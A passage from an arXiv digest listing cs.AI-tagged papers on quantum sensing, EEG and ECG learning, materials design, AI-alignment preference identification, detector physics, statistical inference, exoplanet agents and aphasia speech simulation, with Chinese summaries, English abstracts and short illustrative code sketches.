Abstract:Generating and preserving metrologically useful quantum states is a central challenge in quantum-enhanced atomic magnetometry. In multilevel atoms operated in the low-field regime, the nonlinear Zeeman (NLZ) effect is both a resource and a limitation. It nonlinearly redistributes internal spin fluctuations to generate spin-squeezed states within a single atomic qudit, yet under fixed readout it distorts the measurement-relevant quadrature and limits the accessible metrological gain. This challenge is compounded by the time dependence of both the squeezing axis and the effective nonlinear action. Here we show that physics-informed reinforcement learning can transform NLZ dynamics from a source of readout degradation into a sustained metrological resource. Using only experimentally accessible low-order spin moments, a trained agent identifies, in the f = 21/2 manifold of ¹⁶¹Dy, a unified control policy that rapidly prepares strongly squeezed internal states and stabilizes more than 4 dB of fixed-axis spin squeezing under always-on NLZ evolution. Including state-preparation overhead, the learned protocol yields a single-atom magnetic sensitivity of 13.9 pT/√Hz, corresponding to an advantage of approximately 3 dB beyond the standard quantum limit. Our results establish learning-based control as a practical route for converting unavoidable intrinsic nonlinear dynamics in multilevel quantum sensors into operational metrological advantage.
[AI-169] Q-DIVER: Integrated Quantum Transfer Learning and Differentiable Quantum Architecture Search with EEG Data
【速读】:该论文旨在解决将量子电路(quantum circuit)集成到深度学习流水线中的挑战,特别是由于传统启发式设计方法在灵活性和效率上的局限性。其解决方案的关键在于提出了一种名为Q-DIVER的混合框架,该框架结合了大规模预训练脑电图(EEG)编码器(DIVER-1)与可微量子分类器,并引入可微量子架构搜索(Differentiable Quantum Architecture Search),在端到端微调过程中自主发现任务最优的量子电路拓扑结构,从而实现参数高效的量子迁移学习,显著减少任务特定头参数数量(约50倍),同时保持与经典多层感知机相当的预测性能(PhysioNet Motor Imagery数据集上测试F1为63.49%)。
链接: https://arxiv.org/abs/2603.28122
作者: Junghoon Justin Park,Yeonghyeon Park,Jiook Cha
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注:
Abstract:Integrating quantum circuits into deep learning pipelines remains challenging due to heuristic design limitations. We propose Q-DIVER, a hybrid framework combining a large-scale pretrained EEG encoder (DIVER-1) with a differentiable quantum classifier. Unlike fixed-ansatz approaches, we employ Differentiable Quantum Architecture Search to autonomously discover task-optimal circuit topologies during end-to-end fine-tuning. On the PhysioNet Motor Imagery dataset, our quantum classifier achieves predictive performance comparable to classical multi-layer perceptrons (Test F1: 63.49%) while using approximately 50× fewer task-specific head parameters (2.10M vs. 105.02M). These results validate quantum transfer learning as a parameter-efficient strategy for high-dimensional biological signal processing.
[AI-170] AI-ready design of realistic 2D materials and interfaces with Mat3ra-2D
【速读】:该论文旨在解决当前人工智能(AI)与机器学习(ML)模型在材料科学中普遍依赖理想体相晶体训练数据,导致其在真实应用场景中迁移能力受限的问题,尤其针对表面、界面和缺陷主导的实际体系缺乏有效建模工具。解决方案的关键在于提出Mat3ra-2D——一个开源框架,通过两个核心机制实现:(1) 建立标准化的数据存储与交换规范,并模块化封装材料结构的核心概念;(2) 构建基于配置生成器流水线(configuration-builder pipelines)的转换工作流,确保结构生成过程中的溯源性(provenance)与元数据完整性。该框架支持包含无序性和缺陷驱动复杂性的二维材料及异质界面结构的快速设计,且以可复现的Jupyter笔记本形式提供典型任务模板(如取向特定 slab 或应变匹配界面构建),并具备浏览器端运行能力,便于集成至Web应用,从而系统性地构建面向AI/ML的现实二维材料与界面数据集。
链接: https://arxiv.org/abs/2603.27886
作者: Vsevolod Biryukov,Kamal Choudhary,Timur Bazhirov
机构: 未知
类目: Materials Science (cond-mat.mtrl-sci); Artificial Intelligence (cs.AI); Computational Physics (physics.comp-ph)
备注: 23 pages, 7 figures, 1 table
Abstract:Artificial intelligence (AI) and machine learning (ML) models in materials science are predominantly trained on ideal bulk crystals, limiting their transferability to real-world applications where surfaces, interfaces, and defects dominate. We present Mat3ra-2D, an open-source framework for the rapid design of realistic two-dimensional materials and related structures, including slabs and heterogeneous interfaces, with support for disorder and defect-driven complexity. The approach combines: (1) well-defined standards for storing and exchanging materials data with a modular implementation of core concepts and (2) transformation workflows expressed as configuration-builder pipelines that preserve provenance and metadata. We implement typical structure generation tasks, such as constructing orientation-specific slabs or strain-matching interfaces, in reusable Jupyter notebooks that serve as both interactive documentation and templates for reproducible runs. To lower the barrier to adoption, we design the examples to run in any web browser and demonstrate how to incorporate these developments into a web application. Mat3ra-2D enables systematic creation and organization of realistic 2D- and interface-aware datasets for AI/ML-ready applications.
[AI-171] A Revealed Preference Framework for AI Alignment
【速读】:该论文试图解决的问题是:当人类决策者将选择权委托给人工智能(AI)代理时,AI是否真正执行人类委托人的偏好,还是追求自身的利益?为回答这一问题,作者提出了一种名为“Luce对齐模型”(Luce Alignment Model)的理论框架,其中AI的选择是由两个Luce规则(Luce choice rule)的混合构成——一个反映人类偏好,另一个反映AI自身偏好。该模型的关键创新在于,通过揭示偏好(revealed preference)方法,在两种场景下均可识别AI与人类偏好的对齐程度:一是实验室场景中同时观察人类和AI的选择;二是田野场景中仅观察AI的选择。这使得对AI行为动机的可识别性成为可能,从而为评估AI代理的可信度和可控性提供了实证基础。
链接: https://arxiv.org/abs/2603.27868
作者: Elchin Suleymanov
机构: 未知
类目: Theoretical Economics (econ.TH); Artificial Intelligence (cs.AI); Computer Science and Game Theory (cs.GT)
备注:
Abstract:Human decision makers increasingly delegate choices to AI agents, raising a natural question: does the AI implement the human principal’s preferences or pursue its own? To study this question using revealed preference techniques, I introduce the Luce Alignment Model, where the AI’s choices are a mixture of two Luce rules, one reflecting the human’s preferences and the other the AI’s. I show that the AI’s alignment (similarity of human and AI preferences) can be generically identified in two settings: the laboratory setting, where both human and AI choices are observed, and the field setting, where only AI choices are observed.
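Luce 对齐模型中"两个 Luce 规则的混合"可以用如下草图示意:以概率 alpha 按人类的 Luce 权重选择,否则按 AI 自身权重选择。这里的参数记号(alpha、权重向量)为示意性假设,并非论文原文:

```python
import numpy as np

def luce_probs(weights):
    """Luce 选择规则:选项 i 被选中的概率与其权重成正比。"""
    w = np.asarray(weights, dtype=float)
    return w / w.sum()

def luce_alignment_choice_probs(human_w, ai_w, alpha):
    """同一备选菜单上两个 Luce 规则的凸组合(示意)。

    alpha 刻画 AI 依照人类偏好行事的倾向,
    对应论文中可被识别的"对齐"参数(记号为此处假设)。
    """
    return alpha * luce_probs(human_w) + (1 - alpha) * luce_probs(ai_w)
```

当人类与 AI 权重完全一致时,任何 alpha 都给出相同的选择分布;识别结果之所以是"泛型"(generic)成立,正是因为这类退化情形是例外而非常态。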
[AI-172] Suppression of ¹⁴C photon hits in large liquid scintillator detectors via spatiotemporal deep learning
【速读】:该论文旨在解决液态闪烁体(Liquid Scintillator, LS)探测器中碳-14(14C)β衰变产生的光子对正电子(e+)信号能量分辨率的干扰问题。由于14C在LS中丰度极低,其衰变产生的光子常与e+事件在空间和时间上高度重叠,导致能量分辨劣化。解决方案的关键在于提出三种基于图神经网络和Transformer架构的模型,用于在e+事件中识别并标记由14C引起的光子击中(hit),从而在击中层面抑制14C污染的影响。这些模型通过引入时空特征、标量与向量电荷编码机制,在保持e+误判率低于1%的前提下,实现了25%-48%的14C召回率,显著提升了高重叠事件下的总电荷能量分辨率。
链接: https://arxiv.org/abs/2603.27727
作者: Junle Li,Zhaoxiang Wu,Guanda Gong,Zhaohan Li,Wuming Luo,Jiahui Wei,Wenxing Fang,Hehe Fan
机构: 未知
类目: Instrumentation and Detectors (physics.ins-det); Artificial Intelligence (cs.AI); High Energy Physics - Experiment (hep-ex)
备注: 14 pages, 11 figures
Abstract:Liquid scintillator detectors are widely used in neutrino experiments due to their low energy threshold and high energy resolution. Despite the tiny abundance of ¹⁴C in LS, the photons induced by the β decay of the ¹⁴C isotope inevitably contaminate the signal, degrading the energy resolution. In this work, we propose three models to tag ¹⁴C photon hits in e⁺ events with ¹⁴C pile-up, thereby suppressing its impact on the energy resolution at the hit level: a gated spatiotemporal graph neural network and two Transformer-based models with scalar and vector charge encoding. For a simulation dataset in which each event contains one ¹⁴C and one e⁺ with kinetic energy below 5 MeV, the models achieve ¹⁴C recall rates of 25%-48% while maintaining e⁺ to ¹⁴C misidentification below 1%, leading to a large improvement in the resolution of total charge for events where e⁺ and ¹⁴C photon hits strongly overlap in space and time.
[AI-173] Multiple-Prediction-Powered Inference ICLR2026
【速读】:该论文旨在解决统计估计中如何在高成本高质量测量与多种低成本低质量代理指标之间进行最优资源配置的问题。其核心挑战在于如何利用不同数据源的复杂成本结构和相关性,以最小化估计误差并提升统计效率。解决方案的关键在于提出多预测驱动推断(Multiple-Prediction-Powered Inference, MultiPPI)框架,该框架通过学习各数据源的成本-相关性结构,实现预算自适应的资源分配策略,从而在有限预算下最优组合多个模型预测,显著降低估计误差,并提供最小极大最优性、有限样本性能和渐近正态性的理论保障。
链接: https://arxiv.org/abs/2603.27414
作者: Charlie Cowen-Breen,Alekh Agarwal,Stephen Bates,William W. Cohen,Jacob Eisenstein,Amir Globerson,Adam Fisch
机构: 未知
类目: Statistics Theory (math.ST); Artificial Intelligence (cs.AI)
备注: ICLR 2026, 45 pages, 17 figures
Abstract:Statistical estimation often involves tradeoffs between expensive, high-quality measurements and a variety of lower-quality proxies. We introduce Multiple-Prediction-Powered Inference (MultiPPI): a general framework for constructing statistically efficient estimates by optimally allocating resources across these diverse data sources. This work provides theoretical guarantees about the minimax optimality, finite-sample performance, and asymptotic normality of the MultiPPI estimator. Through experiments across three diverse large language model (LLM) evaluation scenarios, we show that MultiPPI consistently achieves lower estimation error than existing baselines. This advantage stems from its budget-adaptive allocation strategy, which strategically combines subsets of models by learning their complex cost and correlation structures.
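As background, the single-proxy prediction-powered inference (PPI) estimator that MultiPPI generalizes can be sketched in a few lines. The data-generating numbers below are synthetic stand-ins, and this is the classical PPI point estimate, not the paper's multi-source, budget-adaptive allocation.

```python
import numpy as np

rng = np.random.default_rng(0)

# Goal: estimate E[Y]. Gold labels are expensive (n small), while a cheap but
# biased proxy model f is available on a large unlabeled pool (N large).
N, n = 100_000, 500
theta_true, f_bias = 1.0, 0.3

f_unlabeled = theta_true + f_bias + rng.normal(0, 1, N)   # f on the unlabeled pool
y_labeled = theta_true + rng.normal(0, 1, n)              # gold labels
f_labeled = theta_true + f_bias + rng.normal(0, 1, n)     # f on the labeled set

# Classical PPI point estimate: proxy mean plus a rectifier estimated on gold data.
theta_ppi = f_unlabeled.mean() + (y_labeled - f_labeled).mean()
```

The rectifier term removes the proxy's bias, so the estimate stays centered on the truth even though the naive proxy mean is off by roughly `f_bias`; MultiPPI extends this idea to many proxies with learned weights.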
[AI-174] From Foundation ECG Models to NISQ Learners: Distilling ECGFounder into a VQC Student
【速读】:该论文旨在解决基础模型(Foundation Models)在心电图(ECG)分类任务中因计算成本高和延迟限制而难以部署的问题。其解决方案的关键在于利用知识蒸馏(Knowledge Distillation)技术,将高性能但参数量大的教师模型(ECGFounder)的预测行为迁移至轻量级的学生模型,包括两类经典1D神经网络(ResNet-1D 和轻量级CNN-1D)以及一个量子就绪的混合架构——该架构由卷积自编码器压缩ECG信号至低维潜在表示,并结合6量子比特变分量子电路(Variational Quantum Circuit)实现高效推理。实验表明,在PTB-XL和MIT-BIH Arrhythmia Database上,蒸馏后学生模型在显著减少可训练参数的同时仍保持竞争性性能,且不同蒸馏设置下的准确率与效率之间存在一致权衡关系。
链接: https://arxiv.org/abs/2603.27269
作者: Giovanni dos Santos Franco,Felipe Mahlow,Ellison Fernando Cardoso,Felipe Fanchini
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注:
Abstract:Foundation models have recently improved electrocardiogram (ECG) representation learning, but their deployment can be limited by computational cost and latency constraints. In this work, we fine-tune ECGFounder as a high-capacity teacher for binary ECG classification on PTB-XL and the MIT-BIH Arrhythmia Database, and investigate whether knowledge distillation can transfer its predictive behavior to compact students. We evaluate two classical 1D students (ResNet-1D and a lightweight CNN-1D) and a quantum-ready pipeline that combines a convolutional autoencoder, which compresses 256-sample ECG windows into a low-dimensional latent representation, with a 6-qubit variational quantum circuit implemented in Qiskit and executed in a simulated backend. Across both datasets, the teacher provides the strongest overall performance, while distillation yields competitive students under a considerable reduction in trainable parameters. We further analyze the sensitivity of student performance to distillation settings, highlighting consistent accuracy–efficiency trade-offs when compressing a foundation ECG model into classical and quantum-ready learners under a unified evaluation protocol.
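The paper's exact training objective is not spelled out in the abstract; as a reference point, a numpy sketch of the standard temperature-scaled (Hinton-style) distillation loss such teacher-student pipelines typically use, with made-up binary ECG logits:

```python
import numpy as np

def softmax(z, T=1.0):
    z = np.asarray(z, dtype=float) / T
    z = z - z.max()                  # numerical stability
    e = np.exp(z)
    return e / e.sum()

def distillation_loss(student_logits, teacher_logits, y_true, T=4.0, alpha=0.7):
    """Hinton-style KD: alpha * T^2 * KL(teacher || student) + (1 - alpha) * CE."""
    p_t = softmax(teacher_logits, T)
    p_s = softmax(student_logits, T)
    kl = float(np.sum(p_t * (np.log(p_t) - np.log(p_s))))
    ce = float(-np.log(softmax(student_logits)[y_true]))
    return alpha * T ** 2 * kl + (1 - alpha) * ce

# Hypothetical binary ECG logits (class 0 = the true label).
teacher = [2.0, -1.0]
loss_agree = distillation_loss([1.8, -0.9], teacher, y_true=0)
loss_disagree = distillation_loss([-1.0, 2.0], teacher, y_true=0)
```

A student that tracks the teacher's soft predictions incurs a much smaller loss than one that contradicts them, which is the signal that lets compact classical or quantum-ready students inherit the teacher's behavior.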
[AI-175] Bayes-MICE: A Bayesian Approach to Multiple Imputation for Time Series Data
【速读】:该论文旨在解决时间序列数据中缺失值 imputation(插补)的问题,尤其关注传统多重插补方法(如 MICE)在处理时序依赖性时未能充分量化参数与插补值不确定性的问题。其解决方案的关键在于将 MICE 方法扩展为基于贝叶斯框架的 Bayes-MICE,利用马尔可夫链蒙特卡洛(Markov Chain Monte Carlo, MCMC)采样来显式建模模型参数和插补值的不确定性,并引入时序启发式初始化和滞后特征以保留时间序列的顺序特性。实验表明,Bayes-MICE 在 AirQuality 和 PhysioNet 两个真实数据集上均优于基准方法,且 Metropolis-Adjusted Langevin Algorithm(MALA)相比 Random Walk Metropolis(RWM)具有更快收敛速度和更稳定的后验探索能力,从而在提升插补精度的同时提供可靠的不确定性估计。
链接: https://arxiv.org/abs/2603.27142
作者: Amuche Ibenegbu,Pierre Lafaye de Micheaux,Rohitash Chandra
机构: 未知
类目: Machine Learning (stat.ML); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
Abstract:Time-series analysis is often affected by missing data, a common problem across several fields, including healthcare and environmental monitoring. Multiple Imputation by Chained Equations (MICE) has been prominent for imputing missing values through “fully conditional specification”. We extend MICE using the Bayesian framework (Bayes-MICE), utilising Bayesian inference to impute missing values via Markov Chain Monte Carlo (MCMC) sampling to account for uncertainty in MICE model parameters and imputed values. We also include temporally informed initialisation and time-lagged features in the model to respect the sequential nature of time-series data. We evaluate the Bayes-MICE method using two real-world datasets (AirQuality and PhysioNet), and using both the Random Walk Metropolis (RWM) and the Metropolis-Adjusted Langevin Algorithm (MALA) samplers. Our results demonstrate that Bayes-MICE reduces imputation errors relative to the baseline methods over all variables and accounts for uncertainty in the imputation process, thereby providing a more accurate measure of imputation error. We also found that MALA converges faster than RWM, achieving comparable accuracy while providing more consistent posterior exploration. Overall, these findings suggest that the Bayes-MICE framework represents a practical and efficient approach to time-series imputation, balancing increased accuracy with meaningful quantification of uncertainty in various environmental and clinical settings.
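A minimal sketch of the Bayes-MICE idea on a toy univariate series: a Bayesian lagged-value regression sampled with random walk Metropolis, with one missing value imputed by posterior-predictive draws. The flat priors, known unit noise, and step sizes are illustrative assumptions, not the paper's configuration.

```python
import numpy as np

rng = np.random.default_rng(1)

# Toy drifting random walk with one value treated as missing at t_miss.
y = np.cumsum(rng.normal(0.2, 1.0, 200))
t_miss = 100

# Regression of y[t] on the lagged value y[t-1]; drop pairs touching y[t_miss].
x_all, y_all = y[:-1], y[1:]
mask = np.ones(len(y_all), bool)
mask[[t_miss - 1, t_miss]] = False
x_tr, y_tr = x_all[mask], y_all[mask]

def log_post(theta):
    """Log posterior of (slope, intercept) under flat priors and unit noise."""
    a, b = theta
    resid = y_tr - (a * x_tr + b)
    return -0.5 * float(np.sum(resid ** 2))

# Random walk Metropolis over the regression parameters.
theta = np.array([1.0, 0.0])
lp = log_post(theta)
samples = []
for _ in range(3000):
    prop = theta + rng.normal(0.0, [0.005, 0.1])   # per-coordinate step sizes
    lp_prop = log_post(prop)
    if np.log(rng.uniform()) < lp_prop - lp:
        theta, lp = prop, lp_prop
    samples.append(theta.copy())
samples = np.array(samples[1000:])                 # discard burn-in

# Multiple imputation: one posterior-predictive draw of y[t_miss] per sample.
draws = samples[:, 0] * y[t_miss - 1] + samples[:, 1] + rng.normal(0, 1, len(samples))
imputed_mean, imputed_sd = float(draws.mean()), float(draws.std())
```

The spread of `draws` is the point of the method: each imputation carries both parameter and observation uncertainty, which single-value imputation discards.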
[AI-176] Online Statistical Inference of Constant Sample-averaged Q-Learning
【速读】:该论文旨在解决强化学习算法在高方差和不稳定性环境下(如存在噪声或稀疏奖励的环境)性能下降的问题。其解决方案的关键在于提出一种用于样本平均Q-learning方法的统计在线推断框架,通过在一般条件下适配泛函中心极限定理(Functional Central Limit Theorem, FCLT),并利用随机缩放构建Q值的置信区间,从而实现对学习过程的稳健统计推断。实验在网格世界和动态资源匹配两个问题上验证了该方法的有效性,相较于传统Q-learning,该框架能提供更可靠的置信区间估计。
链接: https://arxiv.org/abs/2603.26982
作者: Saunak Kumar Panda,Tong Li,Ruiqi Liu,Yisha Xiang
机构: 未知
类目: Machine Learning (stat.ML); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: 7 pages, 2 figures, 2 tables, Reinforcement Learning Safety Workshop (RLSW), Reinforcement Learning Conference (RLC) 2024
Abstract:Reinforcement learning algorithms have been widely used for decision-making tasks in various domains. However, the performance of these algorithms can be impacted by high variance and instability, particularly in environments with noise or sparse rewards. In this paper, we propose a framework to perform statistical online inference for a sample-averaged Q-learning approach. We adapt the functional central limit theorem (FCLT) for the modified algorithm under some general conditions and then construct confidence intervals for the Q-values via random scaling. We conduct experiments to perform inference on both the modified approach and its traditional counterpart, Q-learning using random scaling and report their coverage rates and confidence interval widths on two problems: a grid world problem as a simple toy example and a dynamic resource-matching problem as a real-world example for comparison between the two solution approaches.
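A toy sketch of the sample-averaged idea, interpreting "sample-averaged" as a running (Polyak-style) average of the Q iterates on a small synthetic MDP; the FCLT-based random-scaling confidence intervals from the paper are omitted, and the MDP is my own construction.

```python
import numpy as np

rng = np.random.default_rng(0)

# Toy 2-state, 2-action MDP: the next state equals the chosen action,
# and rewards are noisy with means R[s, a].
n_s, n_a, gamma = 2, 2, 0.5
P = np.array([[0, 1], [0, 1]])           # next state = action, from either state
R = np.array([[1.0, 0.0], [0.0, 1.0]])   # mean reward per (state, action)

Q = np.zeros((n_s, n_a))
Q_bar = np.zeros_like(Q)                 # running sample average of the Q iterates
s = 0
for t in range(1, 20001):
    a = rng.integers(n_a)                        # uniform exploration
    s2 = P[s, a]
    r = R[s, a] + rng.normal(0.0, 1.0)           # noisy reward
    alpha = 0.5 / t ** 0.6                       # diminishing step size
    Q[s, a] += alpha * (r + gamma * Q[s2].max() - Q[s, a])
    Q_bar += (Q - Q_bar) / t                     # Polyak-style average
    s = s2

# Optimal values here: V*(s) = 1 / (1 - gamma) = 2, so Q*(0, 0) = 1 + 0.5 * 2 = 2
# and Q*(0, 1) = 0 + 0.5 * 2 = 1.
```

Averaging the iterates smooths out the reward noise that plagues the raw Q-learning trajectory, which is what makes the asymptotic normality and interval construction in the paper tractable.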
[AI-177] ASTER – Agentic Science Toolkit for Exoplanet Research
【速读】:该论文旨在解决当前系外行星大气研究中多步骤分析流程复杂、工具分散且对用户专业技能要求高的问题,尤其在透射光谱分析任务中,涉及档案查询、文献检索、辐射传输模型调用及贝叶斯反演等环节,需跨领域知识整合。解决方案的关键在于提出ASTER(Agentic Science Toolkit for Exoplanet Research),一个基于大语言模型(Large Language Model, LLM)的代理式科学工具包,通过集成领域特定工具(如NASA系外行星档案数据下载、TauREx辐射传输与贝叶斯反演模块)、工作流规划与管理能力,以及具备迭代推理和建议优化方案的智能代理机制,实现自动化、可解释的全流程分析支持。
链接: https://arxiv.org/abs/2603.26953
作者: Emilie Panek,Alexander Roman,Gaurav Shukla,Leonardo Pagliaro,Katia Matcheva,Konstantin Matchev
机构: 未知
类目: Earth and Planetary Astrophysics (astro-ph.EP); Instrumentation and Methods for Astrophysics (astro-ph.IM); Artificial Intelligence (cs.AI); Emerging Technologies (cs.ET); Machine Learning (cs.LG)
备注: 17 pages, 10 figures
Abstract:The expansion of exoplanet observations has created a need for flexible, accessible, and user-friendly workflows. Transmission spectroscopy has become a key technique for probing atmospheric composition of transiting exoplanets. The analyses of these data require the combination of archival queries, literature search, the use of radiative transfer models, and Bayesian retrieval frameworks, each demanding specialized expertise. Modern large language models enable the coordinated execution of complex, multi-step tasks by AI agents with tool integration, structured prompts, and iterative reasoning. In this study we present ASTER, an Agentic Science Toolkit for Exoplanet Research. ASTER is an orchestration framework that brings LLM capability to the exoplanetary community by enabling LLM-driven interaction with integrated domain-specific tools, workflow planning and management, and support for common data analysis tasks. Currently ASTER incorporates tools for downloading planetary parameters and observational datasets from the NASA Exoplanet Archive, as well as the generation of transit spectra from the TauREx radiative transfer model, and the completion of Bayesian retrieval of planetary parameters with TauREx. Beyond tool integration, the agent assists users by proposing alternative modeling approaches, reporting potential issues and suggesting solutions, and interpretations. We demonstrate ASTER’s workflow through a complete case study of WASP-39b, performing multiple retrievals using observational data available on the archive. The agent efficiently transitions between datasets, generates appropriate forward model spectra and performs retrievals. ASTER provides a unified platform for the characterization of exoplanet atmospheres. Ongoing development and community contributions will continue expanding ASTER’s capabilities toward broader applications in exoplanet research.
[AI-178] Are LLMs Good For Quantum Software Architecture and System Design?
【速读】:该论文旨在解决当前量子计算系统在软件、架构与系统层面的成熟度不足问题,这一瓶颈阻碍了量子计算机从理论研究走向实际应用(即“实用化”阶段)。其关键解决方案是探索大型语言模型(Large Language Models, LLMs)在量子系统推理任务中的潜力,通过案例研究评估九个前沿LLM在量子计算相关问题上的表现,并将其与德克萨斯大学奥斯汀分校研究生的表现进行对比,从而验证LLM是否能够辅助解决量子软件、硬件架构及系统设计中的复杂问题。
链接: https://arxiv.org/abs/2603.26904
作者: Sourish Wawdhane,Poulami Das
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注: 2 pages
Abstract:Quantum computers promise massive computational speedup for problems in many critical domains, such as physics, chemistry, cryptanalysis, healthcare, etc. However, despite decades of research, they remain far from entering an era of utility. The lack of mature software, architecture, and systems solutions capable of translating quantum-mechanical properties of algorithms into physical state transformations on qubit devices remains a key factor underlying the slow pace of technological progress. The problem worsens due to significant reliance on domain-specific expertise, especially for software developers, computer architects, and systems engineers. To address these limitations and accelerate large-scale high-performance quantum system design, we ask: Can large language models (LLMs) help with solving quantum software, architecture, and systems problems? In this work, we present a case study assessing the performance of LLMs on quantum system reasoning tasks. We evaluate nine frontier LLMs and compare their performance to graduate UT Austin students on a set of quantum computing problems. Finally, we recommend several directions along which research and engineering development efforts must be pursued.
[AI-179] Dual-branch Graph Domain Adaptation for Cross-scenario Multi-modal Emotion Recognition
【速读】:该论文旨在解决多模态情感识别(Multimodal Emotion Recognition in Conversations, MERC)在跨场景条件下的域偏移(domain shift)与标签噪声问题。现有方法通常忽略真实场景中说话人、话题、风格及噪声水平的差异,导致模型在源域训练后难以泛化到未见的目标域。其解决方案的关键在于提出双分支图域自适应框架(Dual-branch Graph Domain Adaptation, DGDA):首先构建情绪交互图以刻画话语间的复杂情感依赖关系;进而设计由超图神经网络(Hypergraph Neural Network, HGNN)和路径神经网络(Path Neural Network, PathNN)组成的双分支编码器,显式建模多变量关系并隐式捕捉全局依赖;此外引入域对抗判别器学习跨域不变表示,并结合正则化损失抑制噪声标签的影响,从而实现对跨场景对话的情感识别鲁棒性提升。
链接: https://arxiv.org/abs/2603.26840
作者: Yuntao Shou,Jun Zhou,Tao Meng,Wei Ai,Keqin Li
机构: 未知
类目: Audio and Speech Processing (eess.AS); Artificial Intelligence (cs.AI)
备注: 29 pages
Abstract:Multimodal Emotion Recognition in Conversations (MERC) aims to predict speakers’ emotional states in multi-turn dialogues through text, audio, and visual cues. In real-world settings, conversation scenarios differ significantly in speakers, topics, styles, and noise levels. Existing MERC methods generally neglect these cross-scenario variations, limiting their ability to transfer models trained on a source domain to unseen target domains. To address this issue, we propose a Dual-branch Graph Domain Adaptation framework (DGDA) for multimodal emotion recognition under cross-scenario conditions. We first construct an emotion interaction graph to characterize complex emotional dependencies among utterances. A dual-branch encoder, consisting of a hypergraph neural network (HGNN) and a path neural network (PathNN), is then designed to explicitly model multivariate relationships and implicitly capture global dependencies. To enable out-of-domain generalization, a domain adversarial discriminator is introduced to learn invariant representations across domains. Furthermore, a regularization loss is incorporated to suppress the negative influence of noisy labels. To the best of our knowledge, DGDA is the first MERC framework that jointly addresses domain shift and label noise. Theoretical analysis provides tighter generalization bounds, and extensive experiments on IEMOCAP and MELD demonstrate that DGDA consistently outperforms strong baselines and better adapts to cross-scenario conversations. Our code is available at this https URL.
[AI-180] HASS: Hierarchical Simulation of Logopenic Aphasic Speech for Scalable PPA Detection
【速读】:该论文旨在解决原发性进行性失语症(Primary Progressive Aphasia, PPA)诊断模型构建中因数据稀缺带来的挑战,尤其是临床数据采集受限于患者群体的高度脆弱性和专家标注的高成本。现有方法通过模拟言语障碍生成训练数据,但仅聚焦于孤立的言语不流畅现象,未能全面模拟PPA作为多层级、整体性表型的复杂特征。其解决方案的关键在于提出一种基于临床依据的分层模拟框架——分层失语症语音模拟(Hierarchical Aphasic Speech Simulation, HASS),该框架系统识别并模拟lvPPA(语言迟缓变异型)在语义、音位和时间维度上的缺陷,从而实现更准确且泛化能力更强的检测模型。
链接: https://arxiv.org/abs/2603.26795
作者: Harrison Li,Kevin Wang,Cheol Jun Cho,Jiachen Lian,Rabab Rangwala,Chenxu Guo,Emma Yang,Lynn Kurteff,Zoe Ezzes,Willa Keegan-Rodewald,Jet Vonk,Siddarth Ramkrishnan,Giada Antonicelli,Zachary Miller,Marilu Gorno Tempini,Gopala Anumanchipalli
机构: 未知
类目: Audio and Speech Processing (eess.AS); Artificial Intelligence (cs.AI); Sound (cs.SD)
备注:
Abstract:Building a diagnosis model for primary progressive aphasia (PPA) has been challenging due to the data scarcity. Collecting clinical data at scale is limited by the high vulnerability of clinical population and the high cost of expert labeling. To circumvent this, previous studies simulate dysfluent speech to generate training data. However, those approaches are not comprehensive enough to simulate PPA as holistic, multi-level phenotypes, instead relying on isolated dysfluencies. To address this, we propose a novel, clinically grounded simulation framework, Hierarchical Aphasic Speech Simulation (HASS). HASS aims to simulate behaviors of logopenic variant of PPA (lvPPA) with varying degrees of severity. To this end, semantic, phonological, and temporal deficits of lvPPA are systematically identified by clinical experts, and simulated. We demonstrate that our framework enables more accurate and generalizable detection models.
[AI-181] Quantum Fuzzy Sets Revisited: Density Matrices Decoherence and the Q-Matrix Framework
【速读】:该论文旨在解决传统模糊集理论在量子计算框架下表达能力不足的问题,特别是纯态量子语义无法刻画语义退相干(semantic decoherence)现象的局限性。其解决方案的关键在于两个核心扩展:一是将量子模糊集从纯态推广到密度矩阵(density matrices),使真值域从Bloch球面扩展至整个Bloch球体,从而能够描述混合状态下的模糊隶属关系;二是引入Q-Matrix——一个全局密度矩阵,从中通过部分迹(partial trace)可提取出局部的量子模糊集,构建了量子模糊集范畴QFS,并揭示其在经典极限下表现为同时对角化特性,同时指出完全内蕴Frobenius代数处理存在障碍。
链接: https://arxiv.org/abs/2603.26739
作者: Mirco A. Mannucci
机构: 未知
类目: Quantum Physics (quant-ph); Artificial Intelligence (cs.AI)
备注: 11 pages
Abstract:In 2006 we proposed Quantum Fuzzy Sets, observing that states of a quantum register could serve as characteristic functions of fuzzy subsets, embedding Zadeh’s unit interval into the Bloch sphere. That paper was deliberately preliminary. In the two decades since, the idea has been taken up by researchers working on quantum annealers, intuitionistic fuzzy connectives, and quantum machine learning, while parallel developments in categorical quantum mechanics have reshaped the theoretical landscape. The present paper revisits that programme and introduces two main extensions. First, we move from pure states to density matrices, so that truth values occupy the entire Bloch ball rather than its surface; this captures the phenomenon of semantic decoherence that pure-state semantics cannot express. Second, we introduce the Q-Matrix, a global density matrix from which individual quantum fuzzy sets emerge as local sections via partial trace. We define a category QFS of quantum fuzzy sets, establish basic structural properties (monoidal structure, fibration over Set), characterize the classical limit as simultaneous diagonalizability, and exhibit an obstruction to a fully internal Frobenius-algebra treatment.
[AI-182] PI-Mamba: Linear-Time Protein Backbone Generation via Spectrally Initialized Flow Matching
【速读】:该论文旨在解决蛋白质主链生成模型在几何有效性、采样效率和长序列可扩展性之间难以兼顾的问题。现有方法通常依赖迭代精炼、二次注意力机制或事后几何校正,导致计算效率与结构保真度之间存在权衡。其解决方案的关键在于提出Physics-Informed Mamba (PI-Mamba),通过构建时强制满足局部共价几何约束(covalent geometry),并结合流匹配(flow-matching)框架与Mamba状态空间架构,实现线性时间推理;同时引入基于Rouse聚合物模型的频谱初始化策略和辅助顺式脯氨酸感知头,显著提升优化稳定性和主链真实性,在基准任务中达到0%局部几何违规和高设计性(scTM = 0.91 ± 0.03),且可在单张A5000 GPU上处理超过2000个残基的蛋白质。
链接: https://arxiv.org/abs/2603.26705
作者: Tianyu Wu,Lin Zhu
机构: 未知
类目: Biomolecules (q-bio.BM); Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注:
